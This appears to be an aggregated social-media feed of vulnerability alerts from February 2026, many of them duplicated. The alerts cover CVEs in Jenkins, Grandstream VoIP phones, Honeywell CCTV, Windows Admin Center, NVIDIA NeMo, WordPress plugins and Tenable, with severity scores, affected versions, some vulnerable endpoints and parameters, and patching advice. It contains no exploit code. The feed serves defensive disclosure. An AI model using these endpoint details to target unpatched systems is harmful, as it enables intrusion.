Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerabilit...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27099/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-27099 - High (8)
Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerabilit...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27099/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##⚠️ HIGH severity: Jenkins 2.483-2.550 & LTS 2.492.1-2.541.1 hit by CVE-2026-27099 (stored XSS). Requires Agent/Configure or Agent/Disconnect permissions. Patch, restrict privileges, and review logs! https://radar.offseq.com/threat/cve-2026-27099-vulnerability-in-jenkins-project-je-f2bd90c0 #OffSeq #Jenkins #XSS #Security
##🟠 CVE-2026-27099 - High (8)
Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerabilit...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27099/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-27099 - High (8)
Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerabilit...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27099/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T18:30:38
2 posts
🟠 CVE-2025-61982 - High (7.8)
An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to tr...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-61982/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-61982 - High (7.8)
An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to tr...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-61982/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T18:24:20.040000
2 posts
🔴 CVE-2025-70150 - Critical (9.8)
CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70150/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-70150 - Critical (9.8)
CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70150/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:52:44.520000
2 posts
🟠 CVE-2025-70866 - High (8.8)
LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and use...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70866/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70866 - High (8.8)
LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and use...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70866/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:52:44.520000
2 posts
🟠 CVE-2025-70954 - High (7.5)
A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specifi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70954/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70954 - High (7.5)
A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specifi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70954/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:52:22.253000
2 posts
1 repos
🟠 CVE-2025-70828 - High (8.8)
An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70828/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70828 - High (8.8)
An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70828/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:52:22.253000
2 posts
🔴 CVE-2025-15578 - Critical (9.8)
Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15578/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-15578 - Critical (9.8)
Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15578/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:52:22.253000
2 posts
⚠️ CVE-2026-1334: HIGH-severity out-of-bounds read in SOLIDWORKS eDrawings (2025 SP0/2026 SP0). Exploiting crafted EPRT files can enable code execution. Patch when released, restrict sources, use sandboxing. No known exploits yet. https://radar.offseq.com/threat/cve-2026-1334-cwe-125-out-of-bounds-read-in-dassau-5f48827a #OffSeq #SOLIDWORKS #Infosec
##🟠 CVE-2026-1334 - High (7.8)
An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a sp...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1334/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:52:22.253000
3 posts
🟠 CVE-2026-1046 - High (7.6)
Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1046/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1046 - High (7.6)
Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1046/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1046 - High (7.6)
Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1046/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:52:22.253000
1 posts
🟠 CVE-2026-1750 - High (8.8)
The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1750/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:52:22.253000
1 posts
🟠 CVE-2025-32061 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32061/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
6 posts
Critical Vulnerability in Grandstream GXP1600 VoIP Phones Exposes Users to Remote Code Execution
A severe cybersecurity vulnerability has been discovered in Grandstream GXP1600 VoIP phones that could allow attackers to remotely execute malicious code with root privileges. This flaw, identified as CVE-2026-2329, is caused by an unauthenticated stack-based buffer overflow in the device's firmware. It is critical as it allows remote access via the /cgi-bin/api.values.get…
##CVE-2026-2329: Critical Unauthenticated Stack Buffer Overflow in Grandstream GXP1600 VoIP Phones (FIXED)
##Critical Vulnerability Found in Grandstream GXP1600 Series VoIP Phones: Remote Code Execution Threat
A major cybersecurity flaw has been discovered in the Grandstream GXP1600 series of VoIP phones, exposing users to the potential risk of remote code execution. The vulnerability, identified as CVE-2026-2329, has been assigned a dangerously high CVSS score of 9.3 out of 10, highlighting its severity. This issue could allow attackers to take control of affected devices,…
##🚨 CVE-2026-2329: CRITICAL stack buffer overflow in Grandstream GXP1610 series (all models) via /cgi-bin/api.values.get. Unauth RCE possible — restrict HTTP API access, segment devices, and monitor traffic. Patch ASAP when available. https://radar.offseq.com/threat/cve-2026-2329-cwe-121-stack-based-buffer-overflow--e34cb0a5 #OffSeq #VoIP #RCE #Security
##CVE-2026-2329: Critical Unauthenticated Stack Buffer Overflow in Grandstream GXP1600 VoIP Phones (FIXED)
##🚨 CVE-2026-2329: CRITICAL stack buffer overflow in Grandstream GXP1610 series (all models) via /cgi-bin/api.values.get. Unauth RCE possible — restrict HTTP API access, segment devices, and monitor traffic. Patch ASAP when available. https://radar.offseq.com/threat/cve-2026-2329-cwe-121-stack-based-buffer-overflow--e34cb0a5 #OffSeq #VoIP #RCE #Security
##updated 2026-02-18T17:51:53.510000
10 posts
A single overlooked API flaw lets hackers hijack Honeywell CCTV cameras without even logging in—just how easy is it to take over a surveillance system? The answer is unsettling
##Critical Authentication Bypass in Honeywell CCTV Products Allows Remote Account Takeover
Honeywell reports a critical vulnerability (CVE-2026-1670) in several CCTV models that allows unauthenticated attackers to take over accounts by changing the password recovery email via an exposed API.
**Make sure your CCTV cameras are isolated from the internet and accessible from trusted networks only. Then check your Honeywell CCTV firmware versions and contact their support for patches.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-in-honeywell-cctv-products-allows-remote-account-takeover-4-q-2-4-4/gD2P6Ple2L
⚠️ CRITICAL: Honeywell I-HIB2PI-UL 2MP IP (6.1.22.1216) has CVE-2026-1670 (CWE-306) — missing auth on API enables remote attackers to change recovery emails and take over accounts. Patch or segment now! https://radar.offseq.com/threat/cve-2026-1670-cwe-306-missing-authentication-for-c-7263f78b #OffSeq #Honeywell #Vuln #OTSecurity
##🔴 CVE-2026-1670 - Critical (9.8)
The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-1670 - Critical (9.8)
The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##A single overlooked API flaw lets hackers hijack Honeywell CCTV cameras without even logging in—just how easy is it to take over a surveillance system? The answer is unsettling
##Critical Authentication Bypass in Honeywell CCTV Products Allows Remote Account Takeover
Honeywell reports a critical vulnerability (CVE-2026-1670) in several CCTV models that allows unauthenticated attackers to take over accounts by changing the password recovery email via an exposed API.
**Make sure your CCTV cameras are isolated from the internet and accessible from trusted networks only. Then check your Honeywell CCTV firmware versions and contact their support for patches.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-in-honeywell-cctv-products-allows-remote-account-takeover-4-q-2-4-4/gD2P6Ple2L
⚠️ CRITICAL: Honeywell I-HIB2PI-UL 2MP IP (6.1.22.1216) has CVE-2026-1670 (CWE-306) — missing auth on API enables remote attackers to change recovery emails and take over accounts. Patch or segment now! https://radar.offseq.com/threat/cve-2026-1670-cwe-306-missing-authentication-for-c-7263f78b #OffSeq #Honeywell #Vuln #OTSecurity
##🔴 CVE-2026-1670 - Critical (9.8)
The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-1670 - Critical (9.8)
The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
6 posts
Microsoft Patches Privilege Escalation Flaw in Windows Admin Center
Microsoft patched a privilege escalation vulnerability (CVE-2026-26119) in Windows Admin Center that allows low-privileged users to impersonate administrators. This flaw enables remote command execution and lateral movement across enterprise networks, including Active Directory and Azure environments.
**If you use Windows Admin Center, apply the February 17 security update immediately — this flaw can let an attacker with minimal access take over your entire domain. While you're at it, review who has access to your Admin Center and restrict it to only those who truly need it.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/microsoft-patches-critical-privilege-escalation-flaw-in-windows-admin-center-6-p-x-i-m/gD2P6Ple2L
🚨 CVE-2026-26119 (HIGH, CVSS 8.8): Microsoft Windows Admin Center 1809.0 vulnerable to improper authentication, enabling privilege escalation. No patch or active exploitation yet. Restrict access & monitor closely! https://radar.offseq.com/threat/cve-2026-26119-cwe-287-improper-authentication-in--f09bdabb #OffSeq #WindowsAdminCenter #Security
##🟠 CVE-2026-26119 - High (8.8)
Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26119/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Microsoft Patches Privilege Escalation Flaw in Windows Admin Center
Microsoft patched a privilege escalation vulnerability (CVE-2026-26119) in Windows Admin Center that allows low-privileged users to impersonate administrators. This flaw enables remote command execution and lateral movement across enterprise networks, including Active Directory and Azure environments.
**If you use Windows Admin Center, apply the February 17 security update immediately — this flaw can let an attacker with minimal access take over your entire domain. While you're at it, review who has access to your Admin Center and restrict it to only those who truly need it.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/microsoft-patches-critical-privilege-escalation-flaw-in-windows-admin-center-6-p-x-i-m/gD2P6Ple2L
🚨 CVE-2026-26119 (HIGH, CVSS 8.8): Microsoft Windows Admin Center 1809.0 vulnerable to improper authentication, enabling privilege escalation. No patch or active exploitation yet. Restrict access & monitor closely! https://radar.offseq.com/threat/cve-2026-26119-cwe-287-improper-authentication-in--f09bdabb #OffSeq #WindowsAdminCenter #Security
##🟠 CVE-2026-26119 - High (8.8)
Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26119/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
🟠 CVE-2025-33241 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by loading a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, informatio...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33241/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33241 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by loading a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, informatio...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33241/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
🟠 CVE-2025-33240 - High (7.8)
NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33240/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33240 - High (7.8)
NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33240/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
🟠 CVE-2025-33251 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33251/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33251 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33251/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
🟠 CVE-2025-33245 - High (8)
NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33245/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33245 - High (8)
NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33245/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
🟠 CVE-2025-60035 - High (7.8)
A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipul...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-60035/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-60035 - High (7.8)
A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipul...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-60035/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
🟠 CVE-2025-33253 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service,...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33253/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33253 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service,...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33253/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
4 posts
🚩 CVE-2026-1937 (CRITICAL): YayMail – WooCommerce Email Customizer (all versions) lets Shop Managers escalate privileges via missing AJAX authorization. Admin access at risk! Patch and audit roles ASAP. https://radar.offseq.com/threat/cve-2026-1937-cwe-862-missing-authorization-in-yay-12c0a139 #OffSeq #WordPress #CVE20261937 #WooCommerce
##🔴 CVE-2026-1937 - Critical (9.8)
The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the `yaymail_import_state` AJAX action in all versions ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1937/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚩 CVE-2026-1937 (CRITICAL): YayMail – WooCommerce Email Customizer (all versions) lets Shop Managers escalate privileges via missing AJAX authorization. Admin access at risk! Patch and audit roles ASAP. https://radar.offseq.com/threat/cve-2026-1937-cwe-862-missing-authorization-in-yay-12c0a139 #OffSeq #WordPress #CVE20261937 #WooCommerce
##🔴 CVE-2026-1937 - Critical (9.8)
The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the `yaymail_import_state` AJAX action in all versions ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1937/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
⚠️ CVE-2026-22048: HIGH-severity SSRF in NETAPP StorageGRID (pre-11.9.0.12, 12.0.0.4) with SSO + Entra ID. Authenticated attackers can delete configs/deny access. Patch or disable SSO now. https://radar.offseq.com/threat/cve-2026-22048-918-in-netapp-storagegrid-formerly--5c913f90 #OffSeq #NETAPP #SSRF #Vulnerability
##⚠️ CVE-2026-22048: HIGH-severity SSRF in NETAPP StorageGRID (pre-11.9.0.12, 12.0.0.4) with SSO + Entra ID. Authenticated attackers can delete configs/deny access. Patch or disable SSO now. https://radar.offseq.com/threat/cve-2026-22048-918-in-netapp-storagegrid-formerly--5c913f90 #OffSeq #NETAPP #SSRF #Vulnerability
##updated 2026-02-18T17:51:53.510000
4 posts
🚨 CVE-2026-23599: HIGH severity local privilege escalation in HPE Aruba ClearPass Policy Manager (6.11.0 & 6.12.0, Linux). No patch yet — limit local access, enforce MFA, and monitor systems. https://radar.offseq.com/threat/cve-2026-23599-vulnerability-in-hewlett-packard-en-fdc96349 #OffSeq #Infosec #Vulnerability #ArubaNetworks
##🟠 CVE-2026-23599 - High (7.8)
A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with ro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23599/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CVE-2026-23599: HIGH severity local privilege escalation in HPE Aruba ClearPass Policy Manager (6.11.0 & 6.12.0, Linux). No patch yet — limit local access, enforce MFA, and monitor systems. https://radar.offseq.com/threat/cve-2026-23599-vulnerability-in-hewlett-packard-en-fdc96349 #OffSeq #Infosec #Vulnerability #ArubaNetworks
##🟠 CVE-2026-23599 - High (7.8)
A local privilege-escalation vulnerability has been discovered in the HPE Aruba Networking ClearPass OnGuard Software for Linux. Successful exploitation of this vulnerability could allow a local attacker to achieve arbitrary code execution with ro...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23599/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
🟠 CVE-2025-13691 - High (8.1)
IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13691/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-13691 - High (8.1)
IBM DataStage on Cloud Pak for Data 5.1.2 through 5.3.0 returns sensitive information in an HTTP response that could be used to impersonate other users in the system.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13691/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
2 posts
🟠 CVE-2026-23595 - High (8.8)
An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23595/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23595 - High (8.8)
An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23595/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T17:51:53.510000
4 posts
🔴 CVE-2026-2630 - Critical (9.9)
A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2630/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CVE-2026-2630: CRITICAL OS Command Injection in Tenable Security Center (CVSS 9.9). Authenticated attackers can run arbitrary code on the server. Restrict access, monitor logs, and patch ASAP. https://radar.offseq.com/threat/cve-2026-2630-cwe-78-improper-neutralization-of-sp-3ee12498 #OffSeq #Tenable #Vuln
##🔴 CVE-2026-2630 - Critical (9.9)
A Command Injection vulnerability exists where an authenticated, remote attacker could execute arbitrary code on the underlying server where Tenable Security Center is hosted.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2630/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CVE-2026-2630: CRITICAL OS Command Injection in Tenable Security Center (CVSS 9.9). Authenticated attackers can run arbitrary code on the server. Restrict access, monitor logs, and patch ASAP. https://radar.offseq.com/threat/cve-2026-2630-cwe-78-improper-neutralization-of-sp-3ee12498 #OffSeq #Tenable #Vuln
##updated 2026-02-18T15:32:29
2 posts
🟠 CVE-2026-1368 - High (7.5)
The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the sit...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1368/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1368 - High (7.5)
The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the sit...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1368/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:35
4 posts
🔒 CVE-2026-1426: HIGH severity PHP Object Injection in berocket Advanced AJAX Product Filters (WordPress, <=3.1.9.6). Requires Author access + Live Composer, and a gadget chain in another plugin/theme. Update or audit now! https://radar.offseq.com/threat/cve-2026-1426-cwe-502-deserialization-of-untrusted-d5d3ff22 #OffSeq #WordPress #PHP
##🟠 CVE-2026-1426 - High (8.8)
The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibilit...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1426/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔒 CVE-2026-1426: HIGH severity PHP Object Injection in berocket Advanced AJAX Product Filters (WordPress, <=3.1.9.6). Requires Author access + Live Composer, and a gadget chain in another plugin/theme. Update or audit now! https://radar.offseq.com/threat/cve-2026-1426-cwe-502-deserialization-of-untrusted-d5d3ff22 #OffSeq #WordPress #PHP
##🟠 CVE-2026-1426 - High (8.8)
The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibilit...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1426/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:34
2 posts
🟠 CVE-2025-33250 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-33250 - High (7.8)
NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T15:31:34
2 posts
🟠 CVE-2025-60037 - High (7.8)
A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, spe...
